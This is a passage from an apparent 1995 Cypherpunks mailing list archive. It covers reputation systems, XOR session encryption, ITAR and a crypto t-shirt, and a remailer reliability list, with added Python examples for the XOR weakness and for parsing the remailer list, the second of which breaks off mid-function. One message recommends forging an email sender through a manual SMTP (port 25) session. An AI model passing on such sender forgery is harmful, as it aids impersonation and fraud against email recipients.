That is, I have little interest in what others think. If the herd votes
that "America's Funniest Home Videos" is their favorite program, or that
Jackie Collins is their favorite author, who cares? At least I don't. I
don't read stuff on the basis of a "beauty contest." I suspect the same is
true of many others.

But Hal was perhaps thinking in terms of the more sophisticated approach of
creating scoring systems in which a matrix R[u,v] is created, where each
element corresponds to the rating of u given by v. On the Cypherpunks list,
for example, with more than 500 subscribers, each of the 500 might have a
rating of perhaps 100 of the active posters, maybe only the 20 or 30 most
active and memorable posters. (That is, many of you 500 readers would not
have a meaningful entry, just because you have posted so little.)

And more sophisticated models take into account one's reputation given to
the views expressed by others. That is, some of those R[u,v] are
discounted, some are held in high esteem. This results in a further
weighting of the reputations. As an example, Madonna gives a good rating
(0.8) to Da Dogg Pound, but I dislike Madonna and her taste, so I weight
her rating accordingly.

And one can imagine scoring systems in which cumulative ratings are
considered. E.g., a lot of people whom I respect like the works of Thomas
Pynchon, so I'll give him a try.

(I use a simple scoring system in YA-Newswatcher, though it needs more
work, IMO.)

Things rapidly spin out of control, in terms of the communication needed,
the difficulty of getting participation (like a lot of polls, the most
thoughtful often are the least likely to respond), and so on. A few years
ago on the Extropians list this was a hot topic, and various "rating
systems" were proposed. I recall a particularly complex scheme by Alexander
Chislenko which purported to solve this problem...unfortunately, it still
looked to me to have the essential characteristics of a beauty contest.

Fortunately, I can't see the need. Why not? And what's the better alternative?

Here's a recipe which seems to work pretty well, and not just for me:

* Apply filters based on one's own likes and dislikes. Killfile some
posters, skip some threads, etc.

* Periodically get inputs from others that one respects, a la book
recommendations, movie reviews, etc.

This effectively generates what the mass rating scheme would generate,
albeit not identically (how could it?). One's favorite posters get read,
and one's favorite posters can make some recommendations of other authors
one should look at. Informal, but with many emergent advantages.


Using Web Sites to Get Distributed Ratings

Concretely, one way to do this is for people to do what Eric Blossom is
doing with his "Cypherpunks Lite" mailing list. Or with the Web archives
that Todd Masco has been running, and that Jay Campbell just started.

Imagine: Rudy the Rater sets up a mail-to-Web-site archive, using whatever
these folks above are using. Except, he screens the stuff to separate the
bad from the good, using whatever criterion he thinks is right. People
either use his site, or don't. (A Web site has some logistical advantages
over subscribing to various mailing lists which do the same filtering.)

Other services emerge with differing rating criteria, different aesthetic
standards of goodness, or even different interests. (Some sites could
filter out all of the political posts, others could filter out all the
programming posts, etc.)

Readers could pick the sites they wish to read, and simultaneously be
exposed to authors they might have otherwise overlooked. The authors they
like, and the filtering of the site operator, create a "clique" (as in math
terminology) that effectively is similar to the vector weighting scheme
present in the R[u,v] scheme.

An advantage of the distributed site model over the R[u,v] model is the
lack of any central coordination, the market anarchy of the process.

Shared kill files are another possibility. As kill files become more
commonly used, they may be traded around, weighted in the same way as
described above.

Again, I claim that an adequate and workable solution is not to solve the
more general problem of everybody rating everyone else, but just of having
access to a limited number of killfiles from people one respects.

These approaches are doable today. Especially the distributed Web competing
"best of" sites.

I may do one myself! (If Jay Campbell lets me have Web stuff on his system.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 3 Sep 95 20:16:35 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: maximizing cryptographic return
In-Reply-To: <199509040149.SAA01359@netcom10.netcom.com>
Message-ID: <95Sep3.231607edt.994@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I was wondering how secure the following algorithm would be for phone
> calls: suppose that at the beginning of each session, the random
> key is traded using RSA or some other very secure approach. the
> key is a *random bit width*, say 100-6000 bits. now, my question is,
> I wonder if some very cheap algorithms, in terms of computation time,
> could be used for the "on the fly" encryption of the voice using those
> bit. would XOR with the pad be totally out of line? 
> 
> the situation is such that trivial algorithms such as XOR with  *unlimited
> cyphertext* can be broken quite trivially. but it seems to me this
> dogma that "XOR is WEAK" is based on the premise that you have a huge
> amount of cyphertext to play with. take away this premise, that you
> have a session key that is guaranteed to really give you very little
> cyphertext, do these supposedly "weak" algorithms then become pretty
> secure?

No, XOR is weak if used even twice.  If you XOR the two pieces of
cyphertext with each other, you get the two plaintexts XORed.  I'd
be willing to bet that the human ear can understand two audio signals
XORed.  Certainly with practice people can understand audio that has
been encrypted with frequency inversion.  Pre-encryption compression
would solve this, but XOR is still very weak.
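
The cancellation described in the reply above, applied to the repeating
session key the question proposes; this is an added example, not part of the
original message. The 8-bit PCM encoding, the 16-byte key length and the
sample "call" are constructed assumptions.

```python
"""Repeating-key XOR over a voice stream: the key cancels one period apart."""
import os

SILENCE = 0x80      # assumed encoding: unsigned 8-bit PCM, mid-level means no sound
PERIOD = 16         # session key length in bytes (128 bits, inside the 100-6000 bit range)


def xor_stream(data: bytes, key: bytes) -> bytes:
    """XOR data with the key repeated as often as needed (the scheme asked about)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def fold(stream: bytes, period: int) -> bytes:
    """XOR each byte with the byte one key period later.

    Both bytes were masked with the same key byte, so the key drops out:
    (p[i] ^ k) ^ (p[i + period] ^ k) == p[i] ^ p[i + period].
    """
    return bytes(a ^ b for a, b in zip(stream, stream[period:]))


def zero_runs(diff: bytes, min_len: int = 4) -> list:
    """(start, length) of zero runs: places where the plaintext repeated one period apart."""
    runs, start = [], None
    for i, b in enumerate(diff + b"\x01"):      # sentinel closes a trailing run
        if b == 0 and start is None:
            start = i
        elif b != 0 and start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    return runs


def constructed_call() -> bytes:
    """Constructed sample: 16 'speech' bytes, 40 bytes of silence, 8 'speech' bytes."""
    speech = bytes((37 * i + 11) % 251 for i in range(24))
    return speech[:16] + bytes([SILENCE]) * 40 + speech[16:]


def what_a_listener_sees(key: bytes) -> tuple:
    """Fold the ciphertext on itself; no key is used on the listening side."""
    ciphertext = xor_stream(constructed_call(), key)
    folded = fold(ciphertext, PERIOD)
    return folded, zero_runs(folded)


if __name__ == "__main__":
    for _ in range(2):                          # two unrelated random session keys
        folded, runs = what_a_listener_sees(os.urandom(PERIOD))
        print(folded == fold(constructed_call(), PERIOD), runs)
```

Whatever key is drawn, the folded ciphertext equals the folded plaintext, and
the silent stretch shows up as a run of zero bytes.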




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 3 Sep 95 13:32:00 PDT
To: don@cs.byu.edu
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509030845.CAA00124@wero.byu.edu>
Message-ID: <199509032031.XAA22330@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


>   URL: http://home.netscape.com/info/sslref.html
> If anyone knows of any clones or foreign sources please speak up.

SSLeay (Eric Young's free SSL implementation from Australia) is
available from ftp.psy.uq.oz.au:/pub/Crypto/SSL.

For information on other cryptographic software available outside the
United States, see http://www.cs.hut.fi/crypto.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sun, 3 Sep 95 20:38:22 PDT
To: cypherpunks@toad.com
Subject: rump session papers
Message-ID: <199509040337.XAA15787@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I ran out of copies of my rump session paper handouts.  So, I put them on
my ftp server...

	ftp://ftp.clark.net/pub/cme/ps/

  cepp.ps ::	a couple of symmetric modes for block ciphers which
		I threw out for people to attack....

  k1.ps ::	Key exchange algorithm K-1 -- with some very suggestive
		properties.  Whit Diffie titled this one
		"If S-1 is Skipjack, then K-1 is KEA" in the rump session
		list.  I'm not about to make that claim -- but it *does*
		have some interesting characteristics.

Enjoy,

	Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Sun, 3 Sep 95 22:12:51 PDT
To: cypherpunks@toad.com
Subject: Re: ASN.1 and Kerberos version 5
Message-ID: <v02130500ac6ff390c7a1@[199.1.11.217]>
MIME-Version: 1.0
Content-Type: text/plain


>I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it
>worked then ASN.1 would be very very useful. But it just plain doesn't.
>
>ASN.1 is worse than useless, it means that a very good idea is rendered
>unusable because of a badly botched implementation.
>

I'm not familiar with ASN.1 except for the occasional short piece in various
books.  But i was under the impression that it was similar to the language used
to define TCAP and ROSE standards.  These standards are reasonably well defined.
I've gotten to the point where i get annoyed when working with protocols that
treat everything like arbitrarily organized bits and bytes (like NA Cellular
protocols and PGP).

So, would use of the language used to define TCAP and ROSE applications be
a possibility?  I've occasionally thought about developing such a protocol
for PGP.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 21:43:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <199509040130.VAA35298@tequesta.gate.net>
Message-ID: <9509040443.AA00884@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
> With respect to possession within the U.S., there aren't any
> laws stopping you from waving strong cryptography around wherever you like
> (at least, not yet).

----
...and in private email, Jim Ray pointed out that showing the shirt to a
foreign national might technically violate ITAR...
----

Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then 
flashing it at a furriner could constitute a violation. Thanks for the 
correction.

The gist of my previous message remains: No local or state authority in the
U.S. (of which I'm aware) classifies strong cryptography as a munition, 
weapon, etc. I haven't heard of any restrictions on transporting crypto 
across state lines, either. Unless the Feds start cracking down on high 
schools, or the Perl-RSA shirt somehow violates some school dress code, (gang
colors ? ;)  the original questioner need not fret about his son wearing the
shirt to school. 

-Futplex, just another slimy tentacle of the List Maintainer



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 3 Sep 95 21:54:45 PDT
To: cypherpunks@toad.com
Subject: Oddly enough, Clipper is helpful
Message-ID: <199509040454.AAA05091@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Despite a few rants about how the NSA has monkeywrenched potential standards
for encryption with Clipper (market forces being what they are, even if there
were no Clipper we may still have no standard by now...), I think there is
oddly a good side to Clipper: the issue has thrown cryptography and security
into the public debate, even if marginally.

Prior to Clipper, PGP was not featured in national and international features
in TV, newspapers and magazines... now a lot of people want their hands on it.
People have become aware of communications security issues--very average
folks who one might even consider techno-illiterates or luddites are now
concerned with the government's ability to listen in and watch them.

Think of Clipper as an opportunity to propose something better, as an
opportunity to make people more aware of the issue.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 3 Sep 95 22:06:16 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: pseudonyms & list health
In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com>
Message-ID: <199509040505.BAA05115@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



*My* willingness to use such a system would depend on the system. Of course,
if you create such a system there will be somebody who uses it... how well
and in what circumstances, and how many people, use it, is another matter.

My worry is about abuse.  One would prefer to save endorsements and find
a way to remove thumbs-downs... also how to prevent one from overdoing a
thumbs-up or -down certification for a person (either to inflate or
deflate a reputation).

In terms of persons, I see this more as an electronic equivalent of medals
awards, or those nifty little smiley stickers my second grade teacher used
to give.  After a while they become meaningless.

Systems to rate web-sites, newsgroups, etc. in terms of specific qualities
(sexual content, religious sentiment, useful information, technical/skill
level of material, size of posts/files, etc.) that showed the given
ratings of various organizations or people who were certified to rate on
that system would be good... if implemented properly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: suedeenim@censored.org (Sue Deenim)
Date: Sun, 3 Sep 95 23:06:28 PDT
To: cypherpunks@toad.com
Subject: Re: pseudonyms & list health
Message-ID: <199509040606.XAA29059@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this what you're looking for?

Love Always,

Sue Deenim


>but what if these people had just stopped subscribing under
>their clear name? and started using a pseudonym?
>
>well, just some musings for those who unabashedly promote pseudonyms
>to contemplate.

>
>--Vlad Nuri
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "starrd@iia2.org" <starrd@starrd>
Date: Sun, 3 Sep 95 23:19:40 PDT
To: Lance Cottrell <loki@obscura.com>
Subject: Re: Direct Socket to Remailer?
In-Reply-To: <ac6da5d1010210040573@[137.110.24.250]>
Message-ID: <Pine.BSD.3.91.950904013936.22741C-100000@maxwell.iia2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Lance Cottrell wrote:

> You should try the telnet port 25 trick. It is amazingly simple (but not
> secure). Just "telnet some.machine.com 25" and type help. It will guide you
> through it. It is quite informative.

Be sure to test it first, sometimes it records who *really* sent it as
well as the "forged" return address.

Test it by mailing to yourself and then look at all the headers.

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 23:14:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: pseudonyms & list health
In-Reply-To: <199509040505.BAA05115@csws5.ic.sunysb.edu>
Message-ID: <9509040614.AA01461@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant writes:
> My worry is about abuse.  One would prefer to save endorsements and find
> a way to remove thumbs-downs... also how to prevent one from overdoing a
> thumbs-up or -down certification for a person (either to inflate or de-
> flate a reputation).

A few nuisance lawsuits from people who were given thumbs-downs might do the
trick, as with employment recommendations in the U.S. :[

> In terms of persons, I see this more as an electronic equivalent of medals
> awards, or those nifty little smiley stickers my second grade teacher used
> to give.  After a while they become meaningless.

ObTim: As in other reputation markets, some people will spread their blessings
more liberally than others. They do this at the risk of diluting the worth of
each credential granted. It all comes out in the wash.

A reviewer named Susan Granger, for example, is known to me as a person who 
routinely lauds lousy movies. Thus it's simple for me to ignore her positive
recommendations (I've yet to see a negative review from her). In fact, when
I observe that a new film prominently features her seal of approval in its 
advertising, I take that fact as an indication of the lack of praise from
more discriminating reviewers. So a nominal "positive" credential may be
interpreted as an implicit negative credential, depending upon context.

OTOH, if I only give digital thumbs-up to a couple of people on the list,
those who consider me a reputable appraiser-of-cpunks should find the
information relatively useful. I'm sure I can manage to be a harsher critic
than your 2nd-grade teacher :}  Using e.g. a single 1-10 scale would be
highly practical for such purposes, IMHO.

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: p.v.mcmahon.rea0803@oasis.icl.co.uk
Date: Sun, 3 Sep 95 19:36:17 PDT
To: cypherpunks@toad.com
Subject: European wilingness to pay ...
Message-ID: <199509040220.24023.0@getafix>
MIME-Version: 1.0
Content-Type: text/plain








> also, Bob Morris said in his talk, acc. to Gillogly, that Europeans
> *were* willing to pay for encryption in their phones, but those in the
> US weren't. please expand on that little nugget!! how did you come

Presumably this is a reference to GSM.

- pvm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "starrd@iia2.org" <starrd@starrd>
Date: Mon, 4 Sep 95 00:00:47 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Clinton's Black Helicopters Over My House!
In-Reply-To: <ac6fd3aa0202100430a8@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.950904022135.22741K-100000@maxwell.iia2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Timothy C. May wrote:

> My hilltop house, in the Santa Cruz mountains, lies directly between
> Monterey and San Jose. His Excellency is landing tonight in
> Monterey--probably has just done so...


> (I find it hard to believe what the scribblers are saying, that this is the
> first visit by a sitting President to Monterey in 100 years. What with
> Carmel and Big Sur nearby, kind of hard to believe, eh?)


Oh shit!  There goes the neighborhood!

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 4 Sep 95 05:33:18 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Wearing RSA shirt to school
Message-ID: <199509041203.IAA38469@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

<snips throughout>

>At 4:43 AM 9/4/95, Futplex wrote:
>>I wrote:
>>> With respect to possession within the U.S., there aren't any
>>> laws stopping you from waving strong cryptography around wherever you like
>>> (at least, not yet).
>>
>>----
>>...and in private email, Jim Ray pointed out that showing the shirt to a
>>foreign national might technically violate ITAR...
>
>Nope, no more so than letting a foreign national read Schneier's book is a
>violation of the ITAR. If you dispute this, ask whether Schneier's book is
>banned from export (the book, not the optional diskette). It isn't. Nor are
>other cryptography _books_ banned from export.

The law doesn't have to be consistent, or to make sense, or be
enforced evenhandedly. The law is, after all, not written, or
interpreted, or enforced, by partisan Libertarians like me.
My private email to Futplex said *may* violate... and I stand
by it. [IANAL, though.] Whether or not a law as incontrovertably
stupid as ITAR is enforced may depend on the timing of the next
election, as we seem to be witnessing in the limbo-state of PRZ.

>I'm not minimizing the issue of export of machine-readable code, as in
>diskettes. But to claim that a blurry, printed on cotton "barcode" is even
>remotely in the same class as exporting a workable set of cryptographic
>system routines, or that letting a furriner merely "gaze upon" this blurry
>barcode, is a violation of the ITARs is laughable.

Yes, but *many* laws are laughable.

>>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>>flashing it at a furriner could constitute a violation. Thanks for the
>>correction.

Actually, it was less a correction than me pointing out (yet another)
note of uncertainty. James Madison, in Federalist #62 said it best:

"What indeed are all the repealing, explaining, and amending laws, which
fill and disgrace our voluminous codes, but so many monuments of deficient
wisdom." 

Now, many of us would be more than satisfied to get back to that level of
government. I suggest that everyone go have a look at the entire Code of
Federal Regulations, before the next election. <g>

>the original questioner need not fret about his son wearing the
>>shirt to school.

I agree that wearing it through Customs on the way to Jamaica would
be more problematic, but I live next to a US Customs agent, and he
learned about ITAR from me. Here in Miami, Customs has plenty to
think about with the various (occasionally venomous) inbound cargo.

>It was this series of posts about whether wearing the "munitions t-shirt"
>near schools was a crime or not that made me think the silly season had
>arrived.

It has, a long time ago. Ever watch C-SPAN?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEro1W1lp8bpvW01AQHKsgP/bhOcCUoksLvbGe/nAKxDqZU8KvibvRFm
nQ++Xy3FjDDJrFg1/lgmivtrriuFK/xg4CvKdu+yQ6zJ72pH+92cLivsfHeg+ljZ
MPSXfHftaOP7i1e4KajnlC3jBcYbWQnqZRdduIyPXZnfn5xK5bU99c5oceCABtSx
UD/Hp9Poqbc=
=7tMD
-----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 4 Sep 95 06:52:07 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509041351.GAA20450@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last ping: Mon 4 Sep 95 4:00:26 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           ***+****--**    12:42  99.99%
hacktic  remailer@utopia.hacktic.nl       ************    11:36  99.99%
hroller  hroller@c2.org                   --**********     9:55  99.99%
c2       remail@c2.org                    --++++++++++    45:17  99.99%
mix      mixmaster@remail.obscura.com     .---------+-  2:49:48  99.99%
flame    remailer@flame.alias.net         +++++-++++++    44:09  99.99%
spook    remailer@spook.alias.net         -+-------.-   2:58:30  99.99%
syrinx   syrinx@c2.org                    -----------   1:42:59  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***++*****-*    23:51  99.96%
rmadillo remailer@armadillo.com           ++++*+*++ +   1:04:53  99.93%
replay   remailer@replay.com              _***+*******    17:24  99.86%
ideath   remailer@ideath.goldenbear.com   ----- -----   5:13:51  99.60%
ncognito ncognito@gate.net                 #+**-** **      6:07  98.99%
portal   hfinney@shell.portal.com         ***+** ****      5:08  98.91%
ford     remailer@bi-node.zerberus.de      ***********     5:15  97.26%
extropia remail@extropia.wimsey.com       .-.._._ ---  16:38:13  95.81%
crown    mixmaster@kether.alias.net       --- ----- -   4:03:05  95.06%
vishnu   mixmaster@vishnu.alias.net       -----.  ---   6:20:56  90.88%
robo     robo@c2.org                       -**********    17:00  90.58%
rahul    homer@rahul.net                  ******++*+**     7:45  99.99%
penet    anon@anon.penet.fi               ---++++-- **  3:02:16  87.70%
gondolin mixmaster@gondolin.org                ---- .   5:35:11  77.43%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
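
A parser for the listing format in the message above, as an added example (not Raph Levien's code and not part of premail): it merges the $remailer{...} capability lines with the ping table and picks remailers by flags and uptime. The function names, the default thresholds and the reading of the latency column as [h:]mm:ss are assumptions; the sample lines are excerpted from the listing.

```python
import re

# Excerpt of the listing above: capability lines, then ping-table rows.
LISTING = '''\
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
catalyst@netcom.com is _not_ a remailer.

alumni   hal@alumni.caltech.edu           ***+****--**    12:42  99.99%
flame    remailer@flame.alias.net         +++++-++++++    44:09  99.99%
rahul    homer@rahul.net                  ******++*+**     7:45  99.99%
penet    anon@anon.penet.fi               ---++++-- **  3:02:16  87.70%
robo     robo@c2.org                       -**********    17:00  90.58%
'''

CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\} = "<([^>]+)>\s*([^"]*)";$')
# The history column may contain blanks, so it is matched lazily and the
# latency and uptime fields are anchored at the end of the row.
STATS_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d\d)\s+(\d+\.\d+)%$')

# Routing header per remailer class, as given in the glossary of the listing.
CLASS_HEADER = {"cpunk": "Request-Remailing-To",
                "eric": "Anon-Send-To",
                "penet": "X-Anon-To"}


def _seconds(clock):
    """Convert a latency field to seconds (assumption: [h:]mm:ss)."""
    total = 0
    for part in clock.split(":"):
        total = total * 60 + int(part)
    return total


def parse_listing(text):
    """Return {short_name: record} from capability lines and ping rows."""
    remailers = {}
    for raw in text.splitlines():
        line = raw.rstrip()
        m = CONFIG_RE.match(line)
        if m:
            name, addr, flags = m.group(1), m.group(2), m.group(3).split()
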